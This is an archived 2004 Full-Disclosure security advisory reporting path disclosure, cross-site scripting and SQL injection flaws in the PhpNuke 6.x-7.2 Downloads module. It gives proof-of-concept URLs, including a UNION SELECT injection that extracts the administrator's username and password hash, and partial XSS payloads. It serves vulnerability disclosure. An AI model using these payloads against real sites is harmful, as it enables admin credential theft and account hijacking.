[Full-Disclosure] [waraxe-2004-SA#027 - Once again - critical vulnerabilities in PhpNuke 6.x - 7.2]

From: Janek Vind (come2waraxe_at_yahoo.com)
Date: 05/05/04

  • Next message: Rodrigo Barbosa: "Re: [Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : apache multiple vulnerabilities, upgraded to apache-1.3.29"
    To: full-disclosure@lists.netsys.com
    Date: Wed, 5 May 2004 08:52:38 -0700 (PDT)
    
    

    {================================================================================}
    { [waraxe-2004-SA#027]
                              }
    {================================================================================}
    {
                              }
    { [ Once again - critical vulnerabilities in
    PhpNuke 6.x - 7.2 ] }
    {
                              }
    {================================================================================}
                                                          
                                                          
                      
    Author: Janek Vind "waraxe"
    Date: 05. May 2004
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/index.php?modname=sa&id=27

    Affected software description:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Php-Nuke is a popular freeware content management
    system, written in php by
    Francisco Burzi. This CMS (Content Management System)
    is used on many thousands
    websites, because it's freeware, easy to install and
    has broad set of features.

    Homepage: http://phpnuke.org

    Vulnerabilities:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    A. Full path disclosure:

    A1 - unsanitaized user submitted variable "show" can
    triger standard php error messages,
    revealing full path to script - information, needed
    for potential hacker.

    Example: make http request like this:

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&show=foobar

    and error message appears:

    Warning: Division by zero in
    D:\apache_wwwroot\nuke72\modules\Downloads\index.php
    on line 797

    B. Cross-site scripting aka XSS:

    XSS can be used for cookie stealing, and because in
    PhpNuke authentication-related information
    is stored in cookies, account's hijacking and ID spoof
    can happen.

    B1 - XSS through unsanitaized user submitted variable
    "ttitle":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=[xss
    code here]
    http://localhost/nuke72/modules.php?name=Downloads&d_op=ratedownload&lid=0&ttitle=
    onload=document.title=1337>

    B2 - XSS through unsanitaized user submitted variable
    "sid":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=[xss
    code here]

    C. Sql injection:

    C1 - noncritical sql injection through unsanitaized
    user submitted variable "orderby":

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewdownload&cid=2&orderby=foobar

    C3 - critical sql injection through unsanitaized user
    submitted variable "sid":

    Let's look at original code from
    "nuke72/modules/Downloads/index.php" line 901:

    $result=$db->sql_query("
    SELECT lid, url, title, description, date, hits,
    downloadratingsummary, totalvotes,
    totalcomments, filesize, version, homepage
    FROM ".$prefix."_downloads_downloads
    WHERE sid=$sid
    order by $orderby
    limit $min,$perpage
    ");

    Oops, "$sid" variable is unquoted in sql query.
    Scary...
    What, if we request something like:

    http://localhost/nuke72/modules.php?name=Downloads&d_op=viewsdownload&sid=-1/**/UNION/**/SELECT/**/0,0,aid,pwd,0,0,0,0,0,0,0,0/**/FROM/**/nuke_authors/**/WHERE/**/radminsuper=1/**/LIMIT/**/1/*

    Cool - admin's username and password's md5 hash in
    plaintext :)

    Have a nice day!

    Greetings:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Greets to Raido Kerna and to all bugtraq readers in
    Estonia! Tervitused!
    Special greets to http://www.gamecheaters.us staff!

    Contact:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        come2waraxe@yahoo.com
        Janek Vind "waraxe"

        Homepage: http://www.waraxe.us/

    ---------------------------------- [ EOF ]
    ------------------------------------

            
                    
    __________________________________
    Do you Yahoo!?
    Win a $20,000 Career Makeover at Yahoo! HotJobs
    http://hotjobs.sweepstakes.yahoo.com/careermakeover

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html


  • Next message: Rodrigo Barbosa: "Re: [Full-Disclosure] UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : apache multiple vulnerabilities, upgraded to apache-1.3.29"

    Relevant Pages